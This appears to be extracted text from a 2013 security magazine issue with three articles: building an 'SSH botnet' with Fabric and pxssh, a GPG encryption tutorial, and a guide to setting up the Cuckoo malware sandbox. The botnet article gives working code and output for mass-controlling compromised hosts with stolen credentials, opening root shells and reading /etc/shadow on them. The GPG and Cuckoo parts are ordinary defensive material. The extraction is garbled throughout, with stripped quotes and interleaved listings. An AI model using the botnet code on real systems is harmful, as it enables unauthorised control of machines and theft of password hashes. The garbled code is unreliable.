sudo(comand) run a shell command on a remote host, with superuser privileges,
local(command) run a command on the local
open _ shell() opens an interactive shell on
the remote system,

Lets assume an attacker managed to compromise

numerous hosts, either using SSH, or via other
means and now has SSH access to them. Lets
also assume that credentials to these hosts are
stored in a file with the following format:
username@hostname:port password

Now for the fun part running commands. There

are 6 types of command execution functions
that we should consider:

The example for this post will be as follows:

[email protected]:22 toor
[email protected]:22 toor

It is important to note that Fabric tries to automatically detect the type of authentication needed
(password or passphrase for private key). Therefore, if the passwords stored in the credentials file
are for private keys, they should work seamlessly.
Now that we have our credentials, lets consider
what functions will we create. For the sake of this
post, lets implement the following:
Status check to see which hosts are running,
Run a supplied command on multiple selected
Create an interactive shell session with a host.
To start, we will import all members of the fabric.
api namespace: (import
from fabric.api import *

Next, we will use two of Fabrics environment variables, env.hosts and env.passwords, to manage our
host connections. Env.hosts is a list we can use to
manage our master host list, and env.passwords is
05/2013 (24) August

Page 30

Listing 1. Installing Fabric via pypm

C:\> pypm install fabric
The following packages will be installed into
%APPDATA%\Python (2.7):
paramiko-1.7.8 pycrypto-2.4 fabric-1.3.0
Get: [] fabric 1.3.0
Get: [] paramiko 1.7.8
Get: [] pycrypto 2.4
Installing paramiko-1.7.8
Installing pycrypto-2.4
Installing fabric-1.3.0
Fixing script %APPDATA%\Python\Scripts\

Listing 2. Function taking a command string

def run_command(command):
with hide(running, stdout, stderr):
if command.strip()[0:5] == sudo:
results = sudo(command)
results = run(command)
results = Error
return results

get(remote _ path, local _ path) download

one or more files from a remote host,
put(local _ path, remote _ path) upload one
or more files to a remote host.
Lets see how we can use these commands. First,
lets create a function that takes in a command
string, and execute the command using Fabrics
run or sudo command as needed (see Listing 2):
Now, let's create a task that will use our run_
command function to see which hosts are up and
running. We will do this by executing the command
uptime on the hosts. (
def check_hosts():
Checks each host to see if its running
for host, result in execute(run_command,

uptime, hosts=env.hosts).iteritems():
running_hosts[host] = result if result.
succeeded else "Host Down"

For the other tasks, we will want to dynamically

select which hosts we want to run a given command on, or establish a shell session to. We can
do this by creating a menu, and then executing
these tasks with a specific list of hosts using Fabrics execute function. To see what this looks like,
look at Listing 3. (
I should note that I left out a task to put a file onto
the remote host, since this can be easily done from
the command line (though a task for this could be
made easily). Let's see what our application looks
like in action (Listing 4). (Output.txt)
As you can see, it looks like we were able to successfully control all of the machines we had ac-

Listing 3. The menu function

def get_hosts():
selected_hosts = []
for host in raw_input(Hosts (eg: 0 1): ).split():
return selected_hosts
def menu():
for num, desc in enumerate([List Hosts, Run Command, Open Shell, Exit]):
print [ + str(num) + ] + desc
choice = int(raw_input(\n + PROMPT))
while (choice != 3):
# If we choose to run a command
if choice == 1:
cmd = raw_input(Command: )
# Execute the run_command task with the given command on the selected hosts
for host, result in execute(run_command, cmd, hosts=get_hosts()).iteritems():
print [ + host + ]: + cmd
print (- * 80) + \n + result + \n
# If we choose to open a shell
elif choice == 2:
host = int(raw_input(Host: ))
execute(open_shell, host=env.hosts[host])
for num, desc in enumerate([List Hosts, Run Command, Open Shell, Exit]):
print [ + str(num) + ] + desc
choice = int(raw_input(\n + PROMPT))
if __name__ == __main__:

05/2013 (24) August

Page 31

Listing 4. Menu function in action
[[email protected]:22] Executing task run_command
[[email protected]:22] Executing task run_command
[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit
fabric $ 1
| Host
| Status
---------------------------------------0 | [email protected]:22
| 07:27:14 up 10:40,
1 | [email protected]:22
| 07:27:12 up 10:39,

2 users,
3 users,

load average: 0.05, 0.03, 0.05

load average: 0.00, 0.01, 0.05

Command: sudo cat /etc/shadow

Hosts (eg: 0 1): 0 1
[[email protected]:22] Executing task run_command
[[email protected]:22] Executing task run_command
[[email protected]:22]: sudo cat /etc/shadow
[[email protected]:22]: sudo cat /etc/shadow

List Hosts
Run Command
Open Shell

05/2013 (24) August

Page 32

cess to. It's important to note that there is so much

more we can do with Fabric to help facilitate the
host management. Here are just a few examples:
By adding the @parallel decorator before our
tasks, our tasks will run in parallel (Note: this wont
work in Windows).
Fabric also allows us to create groups (called
roles). We could use these roles to create groups
based on location, functionality, and so on.
Since our fabfile is just Python, we can extend it
to use any functionality we want. For example, we
could easily create a web interface to this using
Flask or Django. By now you may be very curious
about having your own phantoms running around
your lab. I dont need to emphasize how this knowledge can be put for a bad use.

Constructing the SSH Botnet

Now that we have demonstrated how to control

a host via SSH, let us expand it to control multiple
hosts simultaneously. Attackers often use collections
of compromised computers for malicious purposes.

We call this a botnet because the compromised computers act like bots to carry out instructions.
In order to construct our botnet, we will have to
introduce a new concept a class. The concept
of a class serves as the basis for a programming
model named object oriented programming. In this
system, we instantiate individual objects with associated methods. For our botnet, each individual
bot or client will require the ability to connect and
issue a command (Listing 5).
Examine the code to produce the class object
Client(). Building the client requires a hostname,
username, and a password or a key. Furthermore,
the a class contains the methods required to sustain a client connect(), send_command(), alive().
Notice that when we reference a variable belonging
to a class, we call it self followed by the variable
name. To construct the botnet, we build a global array
named botnet and this array contains individual client
objects. Next, we build a function named addClient()
that takes a host, user, and password as input to instantiate a client object and add it to the botnet ar-

Listing 4. Menu function in action

fabric $ 2
| Host
| Status
---------------------------------------0 | [email protected]:22
| 07:27:14 up 10:40,
1 | [email protected]:22
| 07:27:12 up 10:39,

Host: 1
[[email protected]:22] Executing task open_
Last login: Wed Jul 24 07:27:44 2013 from
root@milindlab:~# whoami
root@milindlab:~# exit
[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit
fabric $ 3

Listing 5. Using classes

import optparse

05/2013 (24) August

2 users,
3 users,

load average: 0.05, 0.03, 0.05

load average: 0.00, 0.01, 0.05

import pxssh
class Client:
def __init__(self, host, user, password): = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
s = pxssh.pxssh()
s.login(, self.user, self.password)
return s
except Exception, e:
print e
print [-] Error Connecting
def send_command(self, cmd):
return self.session.before

Page 33

ray. Next, the botnetCommand() function takes an argument of a command. This function iterates through
the entire array and sends the command to each client in the botnet array (see Listing 6).
By wrapping everything up, we have our final SSH
botnet script. This proves an excellent method for
mass controlling targets. To test, we make three
copies of our current BacktTack 5 virtual machine
and assign. We see that we can the script iterate
through these three hosts and issue simultaneous
commands to each of the victims. While the SSH
Botnet creation script attacked servers directly, the
next section will focus on an indirect attack vector to
target clients through vulnerable servers, and an alternate approach to building a mass infection.


The goal of this post was to give a practical example

showing how attackers could use high quality network management products in ways they werent
intended to be used. Its important to note that this
Listing 6. Iterating through the array
import optparse
import pxssh
class Client:
def __init__(self, host, user, password): = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
s = pxssh.pxssh()
s.login(, self.user, self.password)
return s
except Exception, e:
print e
print [-] Error Connecting
def send_command(self, cmd):
return self.session.before
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print [*] Output from +
print [+] + output + \n
def addClient(host, user, password):
client = Client(host, user, password)

05/2013 (24) August

same functionality could extend to any other IT automation solution such as Chef, Puppet, or Ansible.

Milind Bhargava

Milind Bhargava, (CEH), (ECSA) is in

love with the field of Information Security. During the pursuit of his love,
he has completed his CEH & ECSA certifications in 2010 from EC Council. An Alumni of George Brown College, Toronto, he is currently working as a Network Administrator with
Yellowwood Networks Inc. in Calgary, Alberta, and has
worked as Head of IT for an Oil & Gas MNC in Doha, Qatar, where his responsibilities included, but were not
limited to, Network Security. He believes that ethical
hacking is an addiction, which you can never master.
Its a skill which you can control, but never stop learning more about. And so he continues on his quest as an
eternal student. Find me on LinkedIn: http://ca.linkedin.

botNet = []
addClient(, root, toor)
addClient(, root, toor)
addClient(, root, toor)
botnetCommand(uname -v)
botnetCommand(cat /etc/issue)

Listing 7. Alternate way to mass infect the botnet

attacker:!# python
[*] Output from
[+] uname -v
#1 SMP Wed Jul 31 10:34:20 EST 2013
[*] Output from
[+] uname -v
#1 SMP Wed Jul 31 10:34:20 EST 2013
[*] Output from
[+] uname -v
#1 SMP Wed Jul 31 10:34:20 EST 2013
[*] Output from
[+] cat /etc/issue
BackTrack 5 R3 - 32 bit \n \l
[*] Output from
[+] cat /etc/issue
BackTrack 5 R3 - 32 bit \n \l
[*] Output from
[+] cat /etc/issue
BackTrack 5 R3 - 32 bit \n \l

Page 34


with GPG
We are familiar with cryptography and know something about it
but lets review its history. Cryptography is a technique for secure
communication. In a community, it may mean relationships
between individuals in a society or relationships on the Internet.
The Cryptography from the present world is pulled into the
world of the Internet. The present, or modern, cryptography
engages topics like mathematics, computer science, and electrical

o put it briefly, cryptography is the science

of data encryption. It is so important that it
is not only a personal interest, but it is also
used during the war. In everyday life, we are using
cryptography but some of the concepts are invisible. Today, cryptography is based on mathematical
theory and computer science practice to produce
an algorithm that is hard to break and guess. Cryptography is art.
Cryptography is used to decode an important
message. The receiver takes a ciphered message
and uses a key for converting it to a comprehensible one. There are many reasons to perform cryp-

tography: a messenger may be captured by the

enemy or even deliver the message to the wrong
person. If the message was in plaintext or cleartext, anybody could read and understand it. One of
the most popular stories involves Julius Caesar
he wanted to send a message to his general but
didnt trust his messenger, so he had to encrypt
the message. A certain method occurred to Julius
Caesars mind. He used a simple algorithm to cipher messages. He replaced every A in his messages with a D, every B with an E, and so on, so
someone who knew the algorithm could decipher
his messages. Here is an example:

Figure 1. The process of coding and decoding a message

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Page 36

Plain: A B C D E F G H I J K L M N O P Q R S T U V
Cipher: D E F G H I J K L M N O P Q R S T U V W X

When a general received the encoded message,

he looked at the cipher line and corresponding to
the code, he wrote in the plain line. For example:
Plaintext: my name is julius

Julius Caesar is dead but he didnt know that he

has waged a revolution. After Caesar, cryptography is continuing and new algorithms are created.

In the First World War, cryptography showed its role.

During World War II, there was a revolution in cryptography mechanical and electromechanical science
mixed with cryptography and cipher machines were in
wide use.

Asymmetric key algorithms refer to a cryptographic system with two separate keys, one of
which is secret and one of which is public. Although the two keys are different, both parts of
the key pair are mathematically linked. The first
key task is locked or encrypts the plaintext, and
the other one unlocks or decrypts the ciphertext.
The keys are correlative and neither key can perform both functions by itself. The public key can
be published without worries, but the private key
must not be shown to anyone not authorized to
read the messages. Unlike symmetric key algorithms, a public key algorithm does not require a
secure channel to exchange secret keys between
the sender and the receiver. It is the infrastructure
of several Internet standards like Transport Layer

Modern Cryptography

Claude Elwood Shannon, known as The Father of

Information Theory, was an American mathematician, electronic engineer, and cryptographer. He
initiated modern cryptography.
Modern cryptography consists of symmetric and
asymmetric key algorithms. In symmetrickey algorithms, same cryptographic keys for both encryption of the plaintext and decryption of ciphertext are used. The keys may be the same and it
may be a simple transformation to go between the
two keys.

Figure 2. PGP one of thw Internet cryptography standards

Listing 1. Generating a key

mohsen@crunchbang-jokar:~$ gpg --gen-key
gpg (GnuPG) 1.4.10; Copyright (C) 2008 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
gpg: directory `/home/mohsen/.gnupg created
gpg: new configuration file `/home/mohsen/.gnupg/gpg.conf created
gpg: WARNING: options in `/home/mohsen/.gnupg/gpg.conf are not yet active during this run
gpg: keyring `/home/mohsen/.gnupg/secring.gpg created
gpg: keyring `/home/mohsen/.gnupg/pubring.gpg created
Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
Your selection?

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Page 37

Security (TLS), PGP, and GPG. Each user has
two keys (a public encryption key and a private
decryption key). The public key is available to the
public, but the private key is known only to the recipient. Messages are encrypted with the recipients public key, and can be decrypted only with
the corresponding private key.
We want to describe GnuPG that is used widely
on the Internet.
PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and partitions.
Each public key is added to a username and/or an
email address. For privacy, PGP combines symmetrickey encryption and publickey encryption.
GnuPG, or GPG, is suite of cryptographic software; it is an OpenPGP standard compliant system. GPG program by default is a command line
program but some graphical user interface is provided for it. For example, GnuPG encryption support has been integrated into Kmail, Evolution and
Thunderbird. These are other GUI tools for GPG,
Seahorse for GNOME, KGPG for KDE. GPG is
used in some messengers too, for example psi
and fire. These messengers can automatically
secure messages when GnuPG is installed and
configured. GPG is also embedded in web applications; webbased software such as Horde also
makes use of it. FireGPG is a good example for
Mozilla Firefox. GnuPG also supports symmetric
encryption algorithms but by default, GnuPG uses
the CAST5 symmetrical algorithm.
You can install GPG very easy. It is installed by
default on many Linux distros. For more information about it visit

I want to install it on my favorite Gnu/Linux distro

Crunchbang. You can use the package manager
on your distro for installing it too:
open a terminal and type the following command
For Debian: apt-get install gnupg
For Fedora: yum install gnupg
After that you must generate a key. The commandline option --gen-key is used to create a
new primary keypair (see Listing 1).
GnuPG can create several types of key pairs; the
option that has default label is the correct choice.
Option 2 creates two keypairs. Option 3 creates
only a DSA keypair and option 4 creates only an
RSA keypair. A DSA keypair is usable only for making signatures. Therefore choose 1.
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)

Default option is 2048. It is good for all users and

shows an extremely strong level of security, but
you can change it between 1024 to 4096. The longer the key, the more secure it is against brute
force attacks. But you should keep in mind that encryption and decryption will be slower, as the key
size is increased and a larger key size may affect
the signature length. When you choose a number,
the key size can never be changed (see Listing 2).
Next, you should choose an expiration time for
your key. By default 0 is selected which means the
key never expires, but it is not a good idea. You

Listing 2. Specifying key length

Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0)

Listing 3. Entering your name and e-mail address

You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
Heinrich Heine (Der Dichter) <[email protected]>
Real name:

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can see a <n> alongside options that means you

must choose a number. For example, we want our
key to expire after one year. Therefore we enter 1y:
Key is valid for? (0) 1y
Key expires at Wed 08 Jan 2014 01:56:55 AM EST
Is this correct? (y/N)

Enter y to finish the process. Next, you must enter your name and email address (see Listing 3),
but remember that this information is for authenticating you as a real individual. You can use the
comment field to include aliases or other information. Then, below message appears:
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit?

Next, gpg generates random data to make your

key as unique as possible (see Listing 4). Move
your mouse, type random keys, or perform other
tasks on the system during this step to speed up
the process, and then your key is generated and
ready for use (see Listing 5).
The key fingerprint is a shorthand signature
for your key. To display the fingerprint at any time,
use this command:
gpg --fingerprint your email

Your GPG key ID consists of 8 hex digits that

are located at the end. In our example it is 08E3
A968. If you are asked for the key ID, you should
append 0x to the key ID (0x08E3A968).

You can edit your previous information; for example, enter N to change your name. If the data is
correct, enter O for confirmation.

Make a Backup

You need a Passphrase to protect your secret key.

Enter passphrase:

gpg --export-secret-keys --armor <your email> >

<your name>.asc

Finally, enter a passphrase for your secret key. The

gpg program asks you to enter your passphrase
twice to ensure you made no typing errors.

The Keys List

You can make a backup of your key easily, enter

the following command:

To list the keys on your public keyring use the following command:

Listing 4. Generating random data to make a key unique

We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
Not enough random bytes available. Please do some other work to give
the OS a chance to collect more entropy! (Need 284 more bytes)

Listing 5. The key has been generated

gpg: /home/mohsen/.gnupg/trustdb.gpg: trustdb created
gpg: key 08E3A968 marked as ultimately trusted
public and secret key created and signed.
gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid:
1 signed:
0 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: next trustdb check due at 2014-01-08
2048R/08E3A968 2013-01-08 [expires: 2014-01-08]
Key fingerprint = D6F3 7C52 F617 E31B 4F19 15DD A8F6 6BA5 08E3 A968
mohsen <XXXXXXXX>
2048R/12D6F55B 2013-01-08 [expires: 2014-01-08]

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mohsen@crunchbang-jokar:~$ gpg --list-keys
------------------------------pub 2048R/08E3A968 2013-01-08 [expires: 2014-01-08]
mohsen <XXXXXXXXX>
sub 2048R/12D6F55B 2013-01-08 [expires: 2014-01-08]

Exporting a Public Key

To send your public key to a person you must first

export it. You can send it to some secure server too, to export your public key, you must use
--export option:
mohsen@crunchbang-jokar:~$ gpg --output <a name>.
gpg --export <your email>

The key that has been generated by this command is in binary format, but gpg has a command --armor that will generate your key in the
ASCII format.
mohsen@crunchbang-jokar:~$ gpg --output <a name>.
gpg --armor --export <your email>

To send your key to some public server, you can

use the command below:
gpg --keyserver --send <KEY NAME>

For Key Name, substitute either the key ID of

your primary keypair or any part of a user ID that
identifies your keypair. You can use another server too, for example or
Another way is to visit a key server and copy
paste your key manually. For example, go to http:// or, then
open your public key in the ASCII format that has
been exported via a text editor, copy contains,
paste it into the Submit a key section, and click
submit button.

Importing a public key

You can add a public key via --import option:

mohsen@crunchbang-jokar:~$ gpg --import <key name>.gpg

Encrypting and decrypting documents

This process is very straightforward. If you want to

encrypt a message to Jason, you encrypt it using
Jasons public key, and he decrypts it with his private key. If Jason wants to send you a message,
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he encrypts it using your public key, and you decrypt it with your private key.
To encrypt a document we use the encrypt option. You must have the public keys of the user so
this message can be encrypted and sent. GPG uses
the --output option to output the result. For example:
mohsen@crunchbang-jokar:~$ gpg --output <output
file> --encrypt --recipient <Recipients email>
<input file>

To decrypt a message the option --decrypt is

used. You need the private key with which the
message was encrypted. For example:
mohsen@crunchbang-jokar:~$ gpg --output <output
file> --decrypt <input file>

You need a passphrase to unlock the secret key

user: mohsen <XXXXXXXXXXXXX>
2048-bit RSA key, ID 12D6F55B, created 2013-01-08
(main key ID 08E3A968)
Enter passphrase:

Next, you must enter the private key password to

decrypt the message. Other user friendly command exists as well. For example, to encrypt a
file, you can use the command below:
mohsen@crunchbang-jokar:~$ gpg -a --encrypt -r <
Recipients email> <input file>

To decrypt a message you can use the following

command as well:
mohsen@crunchbang-jokar:~$ gpg -o <output file>
--decrypt <input file>

You can use a symmetric cipher to encrypt the

document. Symmetric encryption is useful for securing documents when the passphrase does not
need to be communicated to others. For this purpose we can use --symmetric option:
mohsen@crunchbang-jokar:~$ gpg --output <output
file> --symmetric <input file>

Next, you must enter your passphrase.

Another useful capability of GPG is that it can
sign a message and if the document is subse-

Page 40

quently modified in any way, verification of the signature will fail. It is like a handwritten signature
with the additional benefit. The user can be sure
a file has not been modified since it was created.
Creating and verifying signatures use the public/
private keypair but not like encryption and decryption, it is a different operation. For example, you
want to use your own private key to digitally sign
a letter and send it to the PenTest Magazine. The
editor uses your public key to check the signature
and verify that the submission indeed came from
you and that it had not been modified since you
sent it. The commandline option --sign is used
to make a digital signature:

mohsen@crunchbang-jokar:~$ gpg --output <output

file> --sign <input file>
You need a passphrase to unlock the secret key for
user: mohsen <XXXXXXXXXX>
2048-bit RSA key, ID 08E3A968, created 2013-01-08
Enter passphrase:

You can check the signature or check the signature and recover the original document. For this
purpose --verify option is used.

Figure 3. Seahorse interface

Figure 4. Creating a new item
Listing 6. Installing Seahorse
root@crunchbang-jokar:/home/mohsen# apt-get
install seahorse
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be
libcryptui0 libgpgme11 libpth20
Suggested packages:
gpgsm gnupg2 seahorse-plugins
The following NEW packages will be installed:
libcryptui0 libgpgme11 libpth20 seahorse
0 upgraded, 4 newly installed, 0 to remove and
128 not upgraded.
Need to get 3,101 kB of archives.
After this operation, 10.3 MB of additional
disk space will be used.
Do you want to continue [Y/n]?

Figure 5. Creating a new PGP key

Figure 6. Establishing a password for your key

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Page 41

mohsen@crunchbang-jokar:~$ gpg --verify <input file>
gpg: Signature made Wed 09 Jan 2013 03:31:42 AM
EST using RSA key ID 08E3A968
gpg: Good signature from mohsen <XXXXXXXXXX>

OK, are you tired of the command line? We will do

a quick review of some GUI tools.
A good tool for managing your keys is Seahorse.
You can install it on a Debian based system with
apt-get install seahorse (see Listing 6) and
Redhat based system with yum install seahorse.
Then enter y and wait for Seahorse to be installed. After that, you can launch Seahorse by typing seahorse in the console (see Figure 3).

Figure 7. Generating key


An Introduction To Cryptography
Codes and Ciphers Julius Caesar the Enigma and
the Internet
Codes, Ciphers And Secret Writing
Cryptography and Public Key Infrastructure on the

From the file menu, Select new.

As you can see, it provides a useful option to
work. You can create an SSH key for connecting
to other computers or storing your password safely
(see Figure 4). For our work, please choose PGP
Key and click Continue.
Fill the information and by choosing Advanced
key option, you can manipulate some options like
Encryption type, Key Strength, and Expiration
Date. Then click Create (see Figure 5). In the
next step, you must enter a password for your key
(see Figure 6).
Then, wait for the program to generate the password (see Figure 7).
After that, by clicking on My Personal Keys tab
you can see your PGP key (see Figure 8).
Another useful tool for encrypting emails is
Enigmail. It is a good tool that merges with Thunderbird and allows you to encrypt and decrypt your
emails easily. After installing Enigmai, open Thunderbird and you can see a menu with the name
OpenPGP. You can manage your keys, create a
new key, import keys and so on. Another useful
option is the setup wizard where you can import
your keys or create new ones (see Figure 9).

Figure 8. The view of the generated keys


Figure 9. Entering Enigmails setup wizard

Mohsen Mostafa Jokar

05/2013 (24) August

GPG is a very big tool that you can secure your

documents with. It is not possible to fully explain
it in this article, but we have tried to explain some
of the more important features. I guess it is mandatory and for some reason anyone must create
a key for personal email. In some countries, the
Internet providers use some deep package sniffers
for listening to some special words that GPG can
help users to safety.

Page 42


Automating Malware
Analysis with Cuckoo
Malicious software has always been problem in the computer industry.
Understanding the way this type of software is written, the impact
it presents to the infected, and removal methodologies is a time
consuming process, especially in corporate environments where you
have thousands of connected devices. A recent study on published by
Panda Labs in 2012 indicated that over 27 million innovative strands of
malware were discovered in the wild [1]. The need for quick, accurate,
and highly automated analysis of malware is warranted.

his article will outline implementing an automated virtual environment to aid in the
identification and analysis of potentially malicious software, what can then be extended to proactively detect and ultimately protect corporate environments from being infected.


Malware, short for malicious (or malevolent) software, is software used or created by attackers to
disrupt computer operation, gather sensitive information, or gain access to private computer systems. It can appear in the form of code, scripts,
active content, and other software. Malware is
a general term used to refer to a variety of forms
of hostile or intrusive software. Malware includes
computer viruses, ransom-ware, worms, trojan
horses, root-kits, key-loggers, dialers, spyware,
adware, malicious (browser helper objects) BHOs
and other malicious programs; the majority of active malware threats are usually worms or trojans
rather than viruses [2].
No longer are computers, or servers only at
risk of being infected, with the popularity of mobile computing, enterprises are quickly adopting
BYOD strategies to support personal devices
within the corporate environment. The conveniences of portable browsers will likely lead to
05/2013 (24) August

more people doing their business on the go. With

this shift in technology use, attackers have developed various new types of malware for mobile
devices including but not limited to ransom-ware,
malware shopping spree, and NFC works to trick
users and infect devices [3].
When we discuss malware analysis, two types
of disciplines are followed, behavioral analysis and
code analysis.

Behavioral Analysis

Behavioral analysis involves executing a malware

specimen in a controlled environment. Within this
environment you should have all of the tools necessary to monitor changes made by the malicious
specimen. This might include tools such as a simple honeypot, an IRC server, DNS services, or a
web server. In addition to this, you should have
tools in place to monitor the actions the malware
takes when interacting with these services. This
means file system integrity tools, registry, and network monitoring software. Example of tools for this
task could include Regshot [4], Wireshark [5] Process explorer [6] and Capture Bat [7].

Code Analysis

Code analysis involves disassembling and reverse engineering the code of the malware. This

Page 44

can be done in a static state where the code is

analyzed without being executed, or in a dynamic
state where the code is examined as it is being
processed by the system. Examples of tools for
this task could include Ollydbg [8], OllyDump [9]
and IDA Pro [10].
These phases are very different and time consuming, however both are essential for performing
a thorough analysis.
For the purpose of this article we will discuss automating behavioral analysis techniques using the
Cuckoo Sandbox [11]. This framework has been
installed on Backtrack 5R3 [12] as our host operating system and Windows 7 enterprise [13] as our
guest. Our virtual platform selected is Oracle VirtualBox [14]. Installing the host and guest operating
systems in your lab is outside the scope of this article. Please see the reference section for additional information on installing Backtrack 5R3 as your
host operating system and Microsoft Windows 7 in
a virtual environment [15/16].
The operating system of your host machines
doesnt particularly matter, although I prefer using
a Linux distribution because it is less susceptible
to a great deal of malware. Extra care should be
taken regarding the location of malware analysis
hosts on your network. Worms and other types of
malware can be self-replicating, so its highly likely
that simply running an executable on a networked
machine can lead to other hosts on that network
being compromised if they arent patched for the
exploited vulnerability or if a 0-day specimen is

being used. Isolating your malware lab from other computers in the network is often not enough.
Typically, you should isolate them from the Internet
as well.

Installing and Configuring Cuckoo

Once your lab is setup with at least one guest operating system, you will need to download Cuckoo [11], the malware sandbox that allows for automating behavior analysis of malicious samples.
Cuckoo Sandbox is an application that provides a
virtual sandbox for the automatic analysis of malware specimens. Originally developed by Claudio Guarnieri for the Google Summer of Code, the
project became so popular it is now a mainstay of
the Honeynet Project, a leading international research institution with a special focus on malware.
The platform allows for the automatic capture and
advanced analysis of dangerous strains of malware in a contained environment [17].
Since Cuckoo is based on Python you will need
to ensure its installed on our system and any additional dependencies needed.
At a high level there are other optional dependencies that are mostly used by modules and utilities. The following libraries are not strictly required,
but their installation is recommended [18]:
Dpkt (Highly Recommended): for extracting relevant information from PCAP files.
Jinja2 (Highly Recommended): for rendering
the HTML reports and the web interface.

Listing 1. Installing Python

# apt-get install python
# apt-get install python-dpkt python-jinja2 python-magic python-pymongo python-libvirt
python-bottle python-pefile python-sqlalchemy

Listing 2. Installing ssdeep


apt-get install ssdeep

svn checkout pyssdeep
cd pyssdeep
python build
python install

Listing 3. Installing tcpdump

# apt-get install tcpdump
# apt-get install libcap2-bin
# setcap cap net raw,cap net admin=eip /usr/local/sbin/tcpdump

05/2013 (24) August

Page 45

Magic (Optional): for identifying files formats
(otherwise use file command line utility)
Pydeep (Optional): for calculating ssdeep fuzzy
hash of files.
Pymongo (Optional): for storing the results in a
MongoDB database.
Yara and Yara Python (Optional): for matching
Yara signatures (use the svn version).
Libvirt (Optional): for using the KVM machine
Bottlepy (Optional): for using the and utilities.
Pefile (Optional): used for static analysis of
PE32 binaries.
Before downloading Cuckoo lets make sure we
have all the necessary dependencies and modules
installed, begin by installing Python (see Listing 1).
ssdeep is a program for computing context triggered piecewise hashes (CTPH), also called fuzzy
hashes. You will need to install ssdeep checksums

and related python modules to support this function (see Listing 2).
TcpDump is necessary for creating packet captures of network activity for analysis on the guest
operating system when malware is submitted; this
is an important step to ensure your sniffer is properly configured (see Listing 3).
A virtualization platform is required; this is where
you will be submitting your malware samples. The
command below will install VirtualBox from the repository, if you decide you can navigate to the website and
manually download and install your platform package (see Listing 4).
Cuckoo sandbox is hosted on Github, if you dont
have git installed below are the commands to achieve
this and clone cuckoo (see Listing 5, Figure 1).
At this point you should have all the necessary
software and recommended dependencies installed, you can begin creating your guest virtual
image using Windows7 or WindowsXP.

Figure 1. Cuckoo install

Listing 4. Installing VirtualBox
# apt-get install virtualbox-4.2

Listing 5. Installing git, cloning cuckoo

# apt-get install git
# cd /opt
# git clone git://

Listing 6. Shared folders creation

root@bt:/opt# VBoxManage sharedfolder add Win7-Cuckoo --name setup --hostpath /opt/cuckoo/shares/
root@bt:/opt# VBoxManage sharedfolder add Win7-Cuckoo --name Win7-Cuckoo --hostpath /opt/

Listing 7. Creating snapshot

root@bt:/opt# VBoxManage snapshot Win7-Cuckoo take Win7-Cuckoo Snap01 pause

05/2013 (24) August

Page 46

Figure 2.

Once your guest operating system is installed its

important to apply all operating system updates,
install the guest additions and various office productivity software for the malware to interact with
(office, adobe reader, flash, etc.). You also want
to ensure that the system is configured NOT to
check for updates, UAC (Windows7) is disabled,
and the operating system firewall is DEACTIVATED. These features arent recommended and can
cause issues during the automated analysis.
After you virtual machine setup is completed,
configure your shared folders. You will want to create two shares, one for named setup (allows for
software installation) and one for the analysis to
be collected in. This is completed on your host machine (see Listing 6).
Once your share are completed you will need to
copy the file from /opt/cuckoo/agent to
the setup folder and install this into the startup folder on your virtual machine. This python script will
execute the malware and create the analysis report for review (see Figure 2).
You will also need ensure the following software
is installed on your Windows virtual machine:
Python 2.7
PIL 1.1.7 (module for screenshots image lib)

Figure 3. Virtualbox.conf

At this point we need to create a snapshot. This

snapshot will automatically be restored each time
cuckoo starts the virtual machine to submit malware (see Listing 7). Before you can submit malware to cuckoo you will need to modify the following conf files located in /opt/cuckoo/conf directory:

Figure 4. Cuckoo.conf

The virtualbox.conf file contains all the configurations for your virtual environment. You will need to

Figure 5. program execution

05/2013 (24) August

Page 47

change the machine name, ip address, and label
to match what you have in your environment (see
Figure 3).
Contained within the cuckoo.conf file is a reporting
server value, make this this matches the ip address
of your host machine. If your unsure of this value
you can set it to as pictured in Figure 4.
At this point we are ready to launch cuckoo and
submit malware samples. To launch the application
type ./
This will start the application and indicate if its
ready for malware specimens. If you receive any
errors on the screen you will need to have these
corrected (see Figure 5).

To submit malware to your sandbox, you will

need to open a new terminal session and use the script in /opt/cuckoo/utils/.
The script can accept many variables, including
URLs, and binary files (see Figure 6).
Below are examples of submitting both a malicious
domain url, and a file located on my host machine.

Figure 6. Submitting malware to cuckoo

Figure 7. Cuckoo analysis directory structure

/opt/cuckoo/utils/ url


[1] Panda Lab Malware Statistics

[2] Wikipedia, Malware, Internet
[3] MacAfee 2013 Threat Predictions
[4] Regshot
[5] Wireshark
[6] Process explorer
[7] Capture Bat
[8] Ollydbg
[9] OllyDump
[10] IDA Pro
[11] Cuckoo Malware Sandbox
[12] Backtrack Linux Distribution
[13] Microsoft Windows 7 Enterprise
[14] Oracle VirtualBox
[15] Installing Backtrack 5
[16] Installing Windows7 in a Virtual Environment
[17] Rapid7 Sponsors Cuckoo Sandbox in the First Round of the Magnificent7 Program
[18] Cuckoo Sandbox Host Requirements
[19] Cuckoo Analysis Results (2.3.5 Analysis Results)

05/2013 (24) August

Page 48

/opt/cuckoo/utils/ /path-to-malware/

Each time malware is submitted the cuckoo

framework will queue your malware, assign a sequential number and turn-on/restore the virtual
machine and perform the analysis. Once the analysis is completed, files are generated and stored
in the /opt/cuckoo/storage/analyses/ folder inside a subdirectory named the previously defined
numerical ID. Contained within you will find traffic and memory dumps, log files, interactive files,
screenshots, etc. [19] (see Figure 7).
Also contained in this directory is a subdirectory named reports. Inside this folder contains an
html report containing all the analysis performed
